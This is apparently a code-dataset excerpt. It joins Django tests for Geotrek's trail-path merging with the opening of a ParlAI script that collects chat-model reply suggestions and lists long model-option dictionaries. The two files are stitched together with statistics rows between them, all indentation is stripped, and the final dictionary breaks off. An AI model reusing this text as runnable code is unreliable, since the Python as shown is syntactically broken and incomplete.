from geotrek.core.factories import PathFactory, TopologyFactory, \
PathAggregationFactory
from geotrek.core.models import PathAggregation, Topology
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
class MergePathTest(TestCase):
def setUp(self):
self.user = SuperUserFactory.create()
self.client.force_login(self.user)
def test_path_merge_without_snap(self):
"""
A B C D A D
|---------| + |---------| --> |------------------|
Test five cases : 1 - A match with C : unification D-C-A-B
2 - A match with D : unification C-D-A-B
3 - B match with C : unification A-B-C-D
4 - B match with D : unification A-B-D-C
5 - no match : no unification
"""
path_AB = PathFactory.create(name="PATH_AB", geom=LineString((0, 0), (4, 0)))
path_CD = PathFactory.create(name="PATH_CD", geom=LineString((4, 0), (8, 0)))
original_AB_length = path_AB.length
original_CD_length = path_CD.length
self.assertEqual(path_AB.merge_path(path_CD), True)
self.assertEqual(path_AB.geom, LineString((0.0, 0.0), (4.0, 0.0), (8.0, 0.0), srid=settings.SRID))
self.assertEqual(path_AB.length, original_AB_length + original_CD_length)
path_AB.delete()
path_CD.delete()
path_AB = PathFactory.create(name="path_AB", geom=LineString((4, 0), (0, 0)))
path_CD = PathFactory.create(name="path_CD", geom=LineString((4, 0), (8, 0)))
original_AB_length = path_AB.length
original_CD_length = path_CD.length
self.assertEqual(path_AB.merge_path(path_CD), True)
self.assertEqual(path_AB.geom, LineString((0, 0), (4, 0), (8, 0), srid=settings.SRID))
self.assertEqual(path_AB.length, original_AB_length + original_CD_length)
path_AB.delete()
path_CD.delete()
path_AB = PathFactory.create(name="path_AB", geom=LineString((4, 0), (0, 0)))
path_CD = PathFactory.create(name="path_CD", geom=LineString((8, 0), (4, 0)))
original_AB_length = path_AB.length
original_CD_length = path_CD.length
self.assertEqual(path_AB.merge_path(path_CD), True)
self.assertEqual(path_AB.geom, LineString((0, 0), (4, 0), (8, 0), srid=settings.SRID))
self.assertEqual(path_AB.length, original_AB_length + original_CD_length)
path_AB.delete()
path_CD.delete()
path_AB = PathFactory.create(name="path_AB", geom=LineString((0, 0), (4, 0)))
path_CD = PathFactory.create(name="path_CD", geom=LineString((8, 0), (4, 0)))
original_AB_length = path_AB.length
original_CD_length = path_CD.length
self.assertEqual(path_AB.merge_path(path_CD), True)
self.assertEqual(path_AB.geom, LineString((0, 0), (4, 0), (8, 0), srid=settings.SRID))
self.assertEqual(path_AB.length, original_AB_length + original_CD_length)
path_AB = PathFactory.create(name="PATH_AB", geom=LineString((0, 0), (4, 0)))
path_CD = PathFactory.create(name="PATH_CD", geom=LineString((50, 0), (100, 0)))
original_AB_length = path_AB.length
self.assertEqual(path_AB.merge_path(path_CD), False)
self.assertEqual(path_AB.length, original_AB_length)
def test_path_merge_with_snap(self):
"""
A B C D A D
|---------| + |---------| --> |------------------|
Test five cases : 1 - A match with C : unification D-C-A-B
2 - A match with D : unification C-D-A-B
3 - B match with C : unification A-B-C-D
4 - B match with D : unification A-B-D-C
5 - no match : no unification
"""
path_AB = PathFactory.create(name="PATH_AB", geom=LineString((0, 0), (15, 0)))
path_CD = PathFactory.create(name="PATH_CD", geom=LineString((16, 0), (30, 0)))
self.assertEqual(path_AB.merge_path(path_CD), True)
self.assertEqual(path_AB.geom, LineString((0, 0), (15, 0), (16, 0), (30, 0), srid=settings.SRID))
path_AB.delete()
path_CD.delete()
path_AB = PathFactory.create(name="path_AB", geom=LineString((15, 0), (0, 0)))
path_CD = PathFactory.create(name="path_CD", geom=LineString((16, 0), (30, 0)))
self.assertEqual(path_AB.merge_path(path_CD), True)
self.assertEqual(path_AB.geom, LineString((0, 0), (15, 0), (16, 0), (30, 0), srid=settings.SRID))
path_AB.delete()
path_CD.delete()
path_AB = PathFactory.create(name="path_AB", geom=LineString((15, 0), (0, 0)))
path_CD = PathFactory.create(name="path_CD", geom=LineString((30, 0), (16, 0)))
self.assertEqual(path_AB.merge_path(path_CD), True)
self.assertEqual(path_AB.geom, LineString((0, 0), (15, 0), (16, 0), (30, 0), srid=settings.SRID))
path_AB.delete()
path_CD.delete()
path_AB = PathFactory.create(name="path_AB", geom=LineString((0, 0), (15, 0)))
path_CD = PathFactory.create(name="path_CD", geom=LineString((30, 0), (16, 0)))
self.assertEqual(path_AB.merge_path(path_CD), True)
self.assertEqual(path_AB.geom, LineString((0, 0), (15, 0), (16, 0), (30, 0), srid=settings.SRID))
path_AB.delete()
path_CD.delete()
path_AB = PathFactory.create(name="PATH_AB", geom=LineString((0, 0), (5, 0)))
path_CD = PathFactory.create(name="PATH_CD", geom=LineString((50, 0), (100, 0)))
self.assertEqual(path_AB.merge_path(path_CD), False)
def test_path_merge_with_other_path_next_ws(self):
"""
F
|
|
E
A---------------B + C-------------------D
Do not merge !
"""
path_AB = PathFactory.create(name="PATH_AB", geom=LineString((0, 1), (10, 1)))
path_CD = PathFactory.create(name="PATH_CD", geom=LineString((10, 1), (20, 1)))
PathFactory.create(name="PATH_EF", geom=LineString((10, 1), (10, 5)))
self.assertEqual(path_AB.merge_path(path_CD), 2)
def test_recompute_pk_no_reverse(self):
"""
A---------------B + C-------------------D A----------------BC----------------D
| | |--| | => | | |--| |
E1 (0.2) | E3 (0.2, 0.3) | E1 (0.1) | E3 (0.6, 0.65) E4 (0.9)
E2 (0.6) E4 (0.8) E2 (0.3)
In case of AB == CD, matching B and C
"""
path_AB = PathFactory.create(name="PATH_AB", geom=LineString((0, 1), (10, 1)))
path_CD = PathFactory.create(name="PATH_CD", geom=LineString((10, 1), (20, 1)))
e1 = TopologyFactory.create(geom=Point(2, 2))
a1 = PathAggregationFactory.create(path=path_AB, topo_object=e1)
e2 = TopologyFactory.create(geom=Point(6, 1))
a2 = PathAggregationFactory.create(path=path_AB, topo_object=e2)
e3 = TopologyFactory.create(geom=LineString((2, 1), (3, 1),))
a3 = PathAggregationFactory.create(path=path_CD, topo_object=e3)
e4 = TopologyFactory.create(geom=Point(8, 2))
a4 = PathAggregationFactory.create(path=path_CD, topo_object=e4)
path_AB_original_length = path_AB.length
path_CD_original_length = path_CD.length
path_AB.merge_path(path_CD)
self.assertEqual(path_AB.geom, LineString((0, 1), (10, 1), (20, 1), srid=settings.SRID))
# reload updated objects
a1_updated = PathAggregation.objects.get(pk=a1.pk)
a2_updated = PathAggregation.objects.get(pk=a2.pk)
a3_updated = PathAggregation.objects.get(pk=a3.pk)
a4_updated = PathAggregation.objects.get(pk=a4.pk)
# test pk recompute on path_1 : new pk = old pk * old_path_1_length / new_path_1_length
self.assertEqual(a1_updated.start_position, a1.start_position * (path_AB_original_length / path_AB.length))
self.assertEqual(a1_updated.end_position, a1.end_position * (path_AB_original_length / path_AB.length))
self.assertEqual(a2_updated.start_position, a2.start_position * (path_AB_original_length / path_AB.length))
self.assertEqual(a2_updated.end_position, a1.end_position * (path_AB_original_length / path_AB.length))
# test pk recompute on path_2 : new pk = old pk * old_path_2_length / new_path_1_length + old_path_1_length / new_path_1_length
self.assertEqual(a3_updated.start_position, a3.start_position * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
self.assertEqual(a3_updated.end_position, a3.end_position * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
self.assertEqual(a4_updated.start_position, a4.start_position * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
self.assertEqual(a4_updated.end_position, a4.end_position * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
def test_path_aggregation(self):
"""
A---------------B + C-------------------D A-----------------BC----------------D
|---------------------| |------------------|
E1 E1
2 path aggregations
"""
path_AB = PathFactory.create(name="PATH_AB", geom=LineString((0, 1), (10, 1)))
path_CD = PathFactory.create(name="PATH_CD", geom=LineString((10, 1), (20, 1)))
e1 = TopologyFactory.create(paths=[(path_AB, 0.5, 1), (path_CD, 0, 0.5)])
path_AB.merge_path(path_CD)
self.assertEqual(path_AB.geom, LineString((0, 1), (10, 1), (20, 1), srid=settings.SRID))
self.assertEqual(PathAggregation.objects.filter(topo_object=e1).count(), 2)
self.assertEqual(PathAggregation.objects.count(), 2)
first = PathAggregation.objects.first()
last = PathAggregation.objects.last()
self.assertEqual((first.start_position, first.end_position), (0.25, 0.5))
self.assertEqual((last.start_position, last.end_position), (0.5, 0.75))
self.assertEqual(Topology.objects.count(), 1)
def test_recompute_pk_reverse_AB(self):
"""
A---------------B + C-------------------D B-----------------AC----------------D
| | |--| | => | | |--| |
E1 (0.2) | E3 (0.2, 0.3) | | E1 (0.4) E3 (0.6, 0.65) E4 (0.9)
E2 (0.6) E4 (0.8) E2 (0.2)
In case of AB == CD, matching A and C
"""
path_AB = PathFactory.create(name="PATH_AB", geom=LineString((10, 1), (0, 1)))
path_CD = PathFactory.create(name="PATH_CD", geom=LineString((10, 1), (20, 1)))
e1 = TopologyFactory.create(geom=Point(2, 2))
a1 = PathAggregationFactory.create(path=path_AB, topo_object=e1)
e2 = TopologyFactory.create(geom=Point(6, 1))
a2 = PathAggregationFactory.create(path=path_AB, topo_object=e2)
e3 = TopologyFactory.create(geom=LineString((2, 1), (3, 1),))
a3 = PathAggregationFactory.create(path=path_CD, topo_object=e3)
e4 = TopologyFactory.create(geom=Point(8, 2))
a4 = PathAggregationFactory.create(path=path_CD, topo_object=e4)
path_AB_original_length = path_AB.length
path_CD_original_length = path_CD.length
path_AB.merge_path(path_CD)
self.assertEqual(path_AB.geom, LineString((0, 1), (10, 1), (20, 1), srid=settings.SRID))
# reload updated objects
a1_updated = PathAggregation.objects.get(pk=a1.pk)
a2_updated = PathAggregation.objects.get(pk=a2.pk)
a3_updated = PathAggregation.objects.get(pk=a3.pk)
a4_updated = PathAggregation.objects.get(pk=a4.pk)
# test pk recompute on path_1 : new pk = old pk * old_path_1_length / new_path_1_length
self.assertEqual(a1_updated.start_position, (1 - a1.start_position) * (path_AB_original_length / path_AB.length))
self.assertEqual(a1_updated.end_position, (1 - a1.end_position) * (path_AB_original_length / path_AB.length))
self.assertEqual(a2_updated.start_position, (1 - a2.start_position) * (path_AB_original_length / path_AB.length))
self.assertEqual(a2_updated.end_position, (1 - a1.end_position) * (path_AB_original_length / path_AB.length))
# test pk recompute on path_2 : new pk = old pk * old_path_2_length / new_path_1_length + old_path_1_length / new_path_1_length
self.assertEqual(a3_updated.start_position, a3.start_position * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
self.assertEqual(a3_updated.end_position, a3.end_position * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
self.assertEqual(a4_updated.start_position, a4.start_position * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
self.assertEqual(a4_updated.end_position, a4.end_position * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
# test offset changes
e1_updated = Topology.objects.get(pk=e1.pk)
self.assertEqual(e1_updated.offset, -e1.offset)
def test_recompute_pk_reverse_CD(self):
"""
A---------------B + C-------------------D A----------------BD----------------C
| | |--| | => | | | |--|
E1 (0.2) | E3 (0.2, 0.3) | E1 (0.1) | | E3 (0.8, 0.9)
E2 (0.6) E4 (0.8) E2 (0.3) E4 (0.6)
In case of AB == CD, matching B and D
"""
path_AB = PathFactory.create(name="PATH_AB", geom=LineString((0, 1), (10, 1)))
path_CD = PathFactory.create(name="PATH_CD", geom=LineString((20, 1), (10, 1)))
e1 = TopologyFactory.create(geom=Point(2, 2))
a1 = PathAggregationFactory.create(path=path_AB, topo_object=e1)
e2 = TopologyFactory.create(geom=Point(6, 1))
a2 = PathAggregationFactory.create(path=path_AB, topo_object=e2)
e3 = TopologyFactory.create(geom=LineString((2, 1), (3, 1),))
a3 = PathAggregationFactory.create(path=path_CD, topo_object=e3)
e4 = TopologyFactory.create(geom=Point(8, 2))
a4 = PathAggregationFactory.create(path=path_CD, topo_object=e4)
path_AB_original_length = path_AB.length
path_CD_original_length = path_CD.length
path_AB.merge_path(path_CD)
self.assertEqual(path_AB.geom, LineString((0, 1), (10, 1), (20, 1), srid=settings.SRID))
# reload updated objects
a1_updated = PathAggregation.objects.get(pk=a1.pk)
a2_updated = PathAggregation.objects.get(pk=a2.pk)
a3_updated = PathAggregation.objects.get(pk=a3.pk)
a4_updated = PathAggregation.objects.get(pk=a4.pk)
# test pk recompute on path_1 : new pk = old pk * old_path_1_length / new_path_1_length
self.assertEqual(a1_updated.start_position, a1.start_position * (path_AB_original_length / path_AB.length))
self.assertEqual(a1_updated.end_position, a1.end_position * (path_AB_original_length / path_AB.length))
self.assertEqual(a2_updated.start_position, a2.start_position * (path_AB_original_length / path_AB.length))
self.assertEqual(a2_updated.end_position, a1.end_position * (path_AB_original_length / path_AB.length))
# test pk recompute on path_2 : new pk = old pk * old_path_2_length / new_path_1_length + old_path_1_length / new_path_1_length
self.assertEqual(a3_updated.start_position, (1 - a3.start_position) * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
self.assertEqual(a3_updated.end_position, (1 - a3.end_position) * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
self.assertEqual(a4_updated.start_position, (1 - a4.start_position) * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
self.assertEqual(a4_updated.end_position, (1 - a4.end_position) * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
# test offset changes
e4_updated = Topology.objects.get(pk=e4.pk)
self.assertEqual(e4_updated.offset, -e4.offset)
def test_recompute_pk_reverse_AB_CD(self):
"""
A---------------B + C-------------------D B----------------AD----------------C
| | |--| | => | | | |--|
E1 (0.2) | E3 (0.2, 0.3) | | E1 (0.4) | E3 (0.8, 0.9)
E2 (0.6) E4 (0.8) E2 (0.2) E4 (0.6)
In case of AB == CD, matching A and D
"""
path_AB = PathFactory.create(name="PATH_AB", geom=LineString((10, 1), (0, 1)))
path_CD = PathFactory.create(name="PATH_CD", geom=LineString((20, 1), (10, 1)))
e1 = TopologyFactory.create(geom=Point(2, 2))
a1 = PathAggregationFactory.create(path=path_AB, topo_object=e1)
e2 = TopologyFactory.create(geom=Point(6, 1))
a2 = PathAggregationFactory.create(path=path_AB, topo_object=e2)
e3 = TopologyFactory.create(geom=LineString((2, 1), (3, 1),))
a3 = PathAggregationFactory.create(path=path_CD, topo_object=e3)
e4 = TopologyFactory.create(geom=Point(8, 2))
a4 = PathAggregationFactory.create(path=path_CD, topo_object=e4)
path_AB_original_length = path_AB.length
path_CD_original_length = path_CD.length
path_AB.merge_path(path_CD)
self.assertEqual(path_AB.geom, LineString((0, 1), (10, 1), (20, 1), srid=settings.SRID))
# reload updated objects
a1_updated = PathAggregation.objects.get(pk=a1.pk)
a2_updated = PathAggregation.objects.get(pk=a2.pk)
a3_updated = PathAggregation.objects.get(pk=a3.pk)
a4_updated = PathAggregation.objects.get(pk=a4.pk)
# test pk recompute on path_1 : new pk = old pk * old_path_1_length / new_path_1_length
self.assertEqual(a1_updated.start_position, (1 - a1.start_position) * (path_AB_original_length / path_AB.length))
self.assertEqual(a1_updated.end_position, (1 - a1.end_position) * (path_AB_original_length / path_AB.length))
self.assertEqual(a2_updated.start_position, (1 - a2.start_position) * (path_AB_original_length / path_AB.length))
self.assertEqual(a2_updated.end_position, (1 - a1.end_position) * (path_AB_original_length / path_AB.length))
# test pk recompute on path_2 : new pk = old pk * old_path_2_length / new_path_1_length + old_path_1_length / new_path_1_length
self.assertEqual(a3_updated.start_position, (1 - a3.start_position) * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
self.assertEqual(a3_updated.end_position, (1 - a3.end_position) * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
self.assertEqual(a4_updated.start_position, (1 - a4.start_position) * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
self.assertEqual(a4_updated.end_position, (1 - a4.end_position) * (path_CD_original_length / path_AB.length) + path_AB_original_length / path_AB.length)
# test offset changes
e1_updated = Topology.objects.get(pk=e1.pk)
self.assertEqual(e1_updated.offset, -e1.offset)
e4_updated = Topology.objects.get(pk=e4.pk)
self.assertEqual(e4_updated.offset, -e4.offset)
def test_response_is_json(self):
response = self.client.post(reverse('core:merge_path'))
self.assertEqual(response.get('Content-Type'), 'application/json')
| 53.574026
| 164
| 0.616746
| 2,785
| 20,626
| 4.318492
| 0.050628
| 0.087304
| 0.080818
| 0.085308
| 0.908705
| 0.903218
| 0.894654
| 0.892824
| 0.882597
| 0.869211
| 0
| 0.04331
| 0.237661
| 20,626
| 384
| 165
| 53.713542
| 0.721572
| 0.179385
| 0
| 0.794521
| 0
| 0
| 0.018837
| 0
| 0
| 0
| 0
| 0
| 0.324201
| 1
| 0.045662
| false
| 0
| 0.03653
| 0
| 0.086758
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
07e61ed751b336ab4aff7fddfcd495c7904bfaaa
| 26,630
|
py
|
Python
|
parlai/scripts/imperial_quips.py
|
shigailowa/ParlAI
|
5bb359cdacb8f2b92ba482273cdff20f0d147a72
|
[
"MIT"
] | null | null | null |
parlai/scripts/imperial_quips.py
|
shigailowa/ParlAI
|
5bb359cdacb8f2b92ba482273cdff20f0d147a72
|
[
"MIT"
] | null | null | null |
parlai/scripts/imperial_quips.py
|
shigailowa/ParlAI
|
5bb359cdacb8f2b92ba482273cdff20f0d147a72
|
[
"MIT"
] | null | null | null |
from parlai.core.params import ParlaiParser
from parlai.core.agents import create_agent
from parlai.core.worlds import create_task
from parlai.core.script import ParlaiScript, register_script
from parlai.utils.world_logging import WorldLogger
from parlai.agents.local_human.local_human import LocalHumanAgent
import parlai.utils.logging as logging
import personalise_message
from parlai.core.build_data import modelzoo_path
from parlai.core.params import get_model_name
import random
class ImperialQuipWorld():
human_agent = None
models = None
models_labels = None
def __init__(self, human_agent, models, models_labels):
self.human_agent = human_agent
self.models = models
self.models_labels = models_labels
def parley(self):
human_input = self.human_agent.act()
suggestions = []
for model in self.models:
model.observe(human_input)
suggestion = model.act()
suggestions.append(suggestion['text'])
print("ImperialQuips suggestions:")
for i in range(len(self.models)):
print(str(i+1)+"." + self.models_labels[i] + ": " + suggestions[i])
return(suggestions)
# python parlai/scripts/interactive.py -mf zoo:pretrained_transformers/model_poly/model -t convai2
#opt_convai = {'init_opt': None, 'task': 'convai2', 'download_path': '/home/tatiana/ParlAI/downloads', 'loglevel': 'success', 'datatype': 'train', 'image_mode': 'raw', 'hide_labels': False, 'multitask_weights': [1], 'batchsize': 1, 'dynamic_batching': None, 'datapath': '/home/tatiana/ParlAI/data', 'model': None, 'model_file': '/home/tatiana/ParlAI/data/models/pretrained_transformers/model_poly/model', 'init_model': None, 'dict_class': 'parlai.core.dict:DictionaryAgent', 'display_examples': False, 'display_prettify': False, 'display_ignore_fields': 'label_candidates,text_candidates', 'interactive_task': True, 'outfile': '', 'save_format': 'conversations', 'local_human_candidates_file': None, 'single_turn': False, 'log_keep_fields': 'all', 'image_size': 256, 'image_cropsize': 224, 'interactive_mode': True, 'embedding_type': 'random', 'embedding_projection': 'random', 'fp16': False, 'fp16_impl': 'apex', 'force_fp16_tokens': False, 'optimizer': 'adamax', 'learningrate': 0.0001, 'gradient_clip': 0.1, 'adam_eps': 1e-08, 'adafactor_eps': (1e-30, 0.001), 'momentum': 0, 'nesterov': True, 'nus': (0.7,), 'betas': (0.9, 0.999), 'weight_decay': None, 'rank_candidates': False, 'truncate': 1024, 'text_truncate': None, 'label_truncate': None, 'history_reversed': False, 'history_size': -1, 'person_tokens': False, 'split_lines': False, 'use_reply': 'label', 'add_p1_after_newln': False, 'delimiter': '\n', 'history_add_global_end_token': None, 'special_tok_lst': None, 'gpu': -1, 'no_cuda': False, 'lr_scheduler': 'reduceonplateau', 'lr_scheduler_patience': 3, 'lr_scheduler_decay': 0.5, 'max_lr_steps': -1, 'invsqrt_lr_decay_gamma': -1, 'warmup_updates': -1, 'warmup_rate': 0.0001, 'update_freq': 1, 'candidates': 'inline', 'eval_candidates': 'inline', 'interactive_candidates': 'fixed', 'repeat_blocking_heuristic': True, 'fixed_candidates_path': None, 'fixed_candidate_vecs': 'reuse', 'encode_candidate_vecs': True, 'encode_candidate_vecs_batchsize': 256, 'train_predict': False, 'cap_num_predictions': 100, 'ignore_bad_candidates': False, 'rank_top_k': -1, 'inference': 'max', 'topk': 5, 'return_cand_scores': False, 'embedding_size': 300, 'n_layers': 2, 'ffn_size': 300, 'dropout': 0.0, 'attention_dropout': 0.0, 'relu_dropout': 0.0, 'n_heads': 2, 'learn_positional_embeddings': False, 'embeddings_scale': True, 'n_positions': None, 'n_segments': 0, 'variant': 'aiayn', 'activation': 'relu', 'output_scaling': 1.0, 'n_encoder_layers': -1, 'n_decoder_layers': -1, 'model_parallel': False, 'use_memories': False, 'wrap_memory_encoder': False, 'memory_attention': 'sqrt', 'normalize_sent_emb': False, 'share_encoders': True, 'share_word_embeddings': True, 'learn_embeddings': True, 'data_parallel': False, 'reduction_type': 'mean', 'dict_file': None, 'dict_initpath': None, 'dict_language': 'english', 'dict_max_ngram_size': -1, 'dict_minfreq': 0, 'dict_maxtokens': -1, 'dict_nulltoken': '__null__', 'dict_starttoken': '__start__', 'dict_endtoken': '__end__', 'dict_unktoken': '__unk__', 'dict_tokenizer': 're', 'dict_lower': False, 'bpe_debug': False, 'dict_textfields': 'text,labels', 'bpe_vocab': None, 'bpe_merge': None, 'bpe_add_prefix_space': None, 'hf_skip_special_tokens': True, 'polyencoder_type': 'codes', 'poly_n_codes': 64, 'poly_attention_type': 'basic', 'poly_attention_num_heads': 4, 'codes_attention_type': 'basic', 'codes_attention_num_heads': 4, 'display_partner_persona': True, 'parlai_home': '/home/tatiana/ParlAI', 'override': {'model_file': '/home/tatiana/ParlAI/data/models/pretrained_transformers/model_poly/model', 'task': 'convai2'}, 'starttime': 'Aug24_12-51'}
opt_convai = {'activation': 'gelu',
'adafactor_eps': '(1e-30, 0.001)',
'adam_eps': 1e-08,
'add_p1_after_newln': False,
'aggregate_micro': False,
'attention_dropout': 0.0,
'batch_length_range': 5,
'batch_sort_cache_type': 'pop',
'batch_sort_field': 'ext',
'batchsize': 16,
'beam_block_full_context': False,
'beam_block_list_filename': None,
'beam_block_ngram': -1,
'beam_context_block_ngram': -1,
'beam_delay': 30,
'beam_length_penalty': 0.65,
'beam_min_length': 1,
'beam_size': 1,
'betas': [0.9, 0.999],
'bpe_add_prefix_space': None,
'bpe_debug': False,
'bpe_merge': None,
'bpe_vocab': None,
'compute_tokenized_bleu': False,
'datapath': '/home/tatiana/.local/lib/python3.8/site-packages/data',
'datatype': 'train',
'delimiter': '\n',
'dict_class': 'parlai.core.dict:DictionaryAgent',
'dict_endtoken':' __end__',
'dict_file': '/home/tatiana/.local/lib/python3.8/site-packages/data/models/dodecadialogue/convai2_ft/model.dict',
'dict_include_test': False,
'dict_include_valid': False,
'dict_initpath': None,
'dict_language': 'english',
'dict_loaded': True,
'dict_lower': True,
'dict_max_ngram_size': -1,
'dict_maxexs': -1,
'dict_maxtokens': -1,
'dict_minfreq': 0,
'dict_nulltoken': '__null__',
'dict_starttoken': '__start__',
'dict_textfields': 'text,labels',
'dict_tokenizer': 'bpe',
'dict_unktoken': '__unk__',
'display_examples': False,
'display_ignore_fields': 'label_candidates,text_candidates',
'display_partner_persona': True,
'display_prettify': False,
'download_path': '/home/tatiana/.local/lib/python3.8/site-packages/downloads',
'dropout': 0.1,
'dynamic_batching': None,
'embedding_projection': 'random',
'embedding_size': 512,
'embedding_type': 'random',
'embeddings_scale': True,
'eval_batchsize': None,
'evaltask': None,
'ffn_size': 2048,
'force_fp16_tokens': False,
'fp16': False,
'fp16_impl': 'apex',
'gpu': -1,
'gradient_clip': 0.1,
'hf_skip_special_tokens': True,
'hide_labels': False,
'history_add_global_end_token': None,
'history_reversed': False,
'history_size': -1,
'image_cropsize': 224,
'image_encoder_num_layers': 1,
'image_features_dim': 2048,
'image_fusion_type': 'late',
'image_mode': None,
'image_size': 256,
'include_image_token': True,
'inference': 'greedy',
'init_model': 'data/models/dodecadialogue/base_model/model',
'init_opt': None,
'interactive_mode': True,
'interactive_task': True,
'invsqrt_lr_decay_gamma': -1,
'label_truncate': 128,
'learn_positional_embeddings': True,
'learningrate': 1e-08,
'load_from_checkpoint': True,
'local_human_candidates_file': None,
'log_every_n_secs': 10.0,
'log_keep_fields': 'all',
'loglevel': 'info',
'lr_scheduler': 'reduceonplateau',
'lr_scheduler_decay': 0.5,
'lr_scheduler_patience': 3,
'max_lr_steps': -1,
'max_train_time': 84600.0,
'metrics': 'default',
'model': 'image_seq2seq',
'model_file': '/home/tatiana/.local/lib/python3.8/site-packages/data/models/dodecadialogue/convai2_ft/model',
'model_parallel': False,
'momentum': 0,
'ultitask_weights': [1],
'n_decoder_layers': -1,
'n_encoder_layers': -1,
'n_heads': 16,
'n_image_channels': 1,
'n_image_tokens': 1,
'n_layers': 8,
'n_positions': 512,
'n_segments': 0,
'nesterov': True,
'no_cuda': False,
'num_epochs': -1,
'numthreads': 1,
'numworkers': 4,
'nus': [0.7],
'optimizer': 'adamax',
'outfile': None,
'output_scaling': 1.0,
'override': {'model_file': '/home/tatiana/.local/lib/python3.8/site-packages/data/models/dodecadialogue/convai2_ft/model', 'task': 'convai2'},
'parlai_home': '/checkpoint/kshuster/projects/parlall/parlall_MT_plus_FT/parlall_MT_plus_FT_sweep1_Tue_Oct_29/ParlAI',
'person_tokens': False,
'pytorch_context_length': -1,
'pytorch_datapath': None,
'pytorch_include_labels': True,
'pytorch_preprocess': False,
'pytorch_teacher_batch_sort': False,
'pytorch_teacher_dataset': None,
'pytorch_teacher_task': None,
'rank_candidates': False,
'relu_dropout': 0.0,
'save_after_valid': True,
'save_every_n_secs': -1,
'save_format': 'conversations',
'share_word_embeddings': True,
'short_final_eval': False,
'show_advanced_args': False,
'shuffle': False,
'single_turn': False,
'skip_generation': True,
'special_tok_lst': None,
'split_lines': False,
'starttime': 'Oct29_07-56',
'task': 'convai2',
'temperature': 1.0,
'tensorboard_log': False,
'text_truncate': 512,
'topk': 10,
'topp': 0.9,
'truncate': -1,
'update_freq': 1,
'use_reply': 'label',
'validation_cutoff': 1.0,
'validation_every_n_epochs': -1,
'validation_every_n_secs': 3600.0,
'validation_max_exs': -1,
'validation_metric': 'ppl',
'validation_metric_mode': min,
'validation_patience': 10,
'validation_share_agent': False,
'variant': 'xlm',
'warmup_rate': 0.0001,
'warmup_updates': 2000,
'weight_decay': None
}
#python parlai interactive -mf zoo:dodecadialogue/empathetic_dialogues_ft/model
#opt_ed = {'init_opt': None, 'task': 'interactive', 'download_path': '/home/tatiana/ParlAI/downloads', 'loglevel': 'info', 'datatype': 'train', 'image_mode': 'raw', 'hide_labels': False, 'multitask_weights': [1], 'batchsize': 1, 'dynamic_batching': None, 'datapath': '/home/tatiana/ParlAI/data', 'model': None, 'model_file': '/home/tatiana/ParlAI/data/models/dodecadialogue/empathetic_dialogues_ft/model', 'init_model': None, 'dict_class': 'parlai.core.dict:DictionaryAgent', 'display_examples': False, 'display_prettify': False, 'display_ignore_fields': 'label_candidates,text_candidates', 'interactive_task': True, 'outfile': '', 'save_format': 'conversations', 'local_human_candidates_file': None, 'single_turn': False, 'log_keep_fields': 'all', 'image_size': 256, 'image_cropsize': 224, 'embedding_size': 300, 'n_layers': 2, 'ffn_size': 300, 'dropout': 0.0, 'attention_dropout': 0.0, 'relu_dropout': 0.0, 'n_heads': 2, 'learn_positional_embeddings': False, 'embeddings_scale': True, 'n_positions': None, 'n_segments': 0, 'variant': 'aiayn', 'activation': 'relu', 'output_scaling': 1.0, 'share_word_embeddings': True, 'n_encoder_layers': -1, 'n_decoder_layers': -1, 'model_parallel': False, 'beam_size': 1, 'beam_min_length': 1, 'beam_context_block_ngram': -1, 'beam_block_ngram': -1, 'beam_block_full_context': True, 'beam_length_penalty': 0.65, 'skip_generation': False, 'inference': 'greedy', 'topk': 10, 'topp': 0.9, 'beam_delay': 30, 'beam_block_list_filename': None, 'temperature': 1.0, 'compute_tokenized_bleu': False, 'interactive_mode': True, 'embedding_type': 'random', 'embedding_projection': 'random', 'fp16': False, 'fp16_impl': 'apex', 'force_fp16_tokens': False, 'optimizer': 'sgd', 'learningrate': 1, 'gradient_clip': 0.1, 'adam_eps': 1e-08, 'adafactor_eps': (1e-30, 0.001), 'momentum': 0, 'nesterov': True, 'nus': (0.7,), 'betas': (0.9, 0.999), 'weight_decay': None, 'rank_candidates': False, 'truncate': -1, 'text_truncate': None, 'label_truncate': None, 'history_reversed': False, 'history_size': -1, 'person_tokens': False, 'split_lines': False, 'use_reply': 'label', 'add_p1_after_newln': False, 'delimiter': '\n', 'history_add_global_end_token': None, 'special_tok_lst': None, 'gpu': -1, 'no_cuda': False, 'dict_file': None, 'dict_initpath': None, 'dict_language': 'english', 'dict_max_ngram_size': -1, 'dict_minfreq': 0, 'dict_maxtokens': -1, 'dict_nulltoken': '__null__', 'dict_starttoken': '__start__', 'dict_endtoken': '__end__', 'dict_unktoken': '__unk__', 'dict_tokenizer': 're', 'dict_lower': False, 'bpe_debug': False, 'dict_textfields': 'text,labels', 'bpe_vocab': None, 'bpe_merge': None, 'bpe_add_prefix_space': None, 'hf_skip_special_tokens': True, 'lr_scheduler': 'reduceonplateau', 'lr_scheduler_patience': 3, 'lr_scheduler_decay': 0.5, 'max_lr_steps': -1, 'invsqrt_lr_decay_gamma': -1, 'warmup_updates': -1, 'warmup_rate': 0.0001, 'update_freq': 1, 'image_features_dim': 2048, 'image_encoder_num_layers': 1, 'n_image_tokens': 1, 'n_image_channels': 1, 'include_image_token': 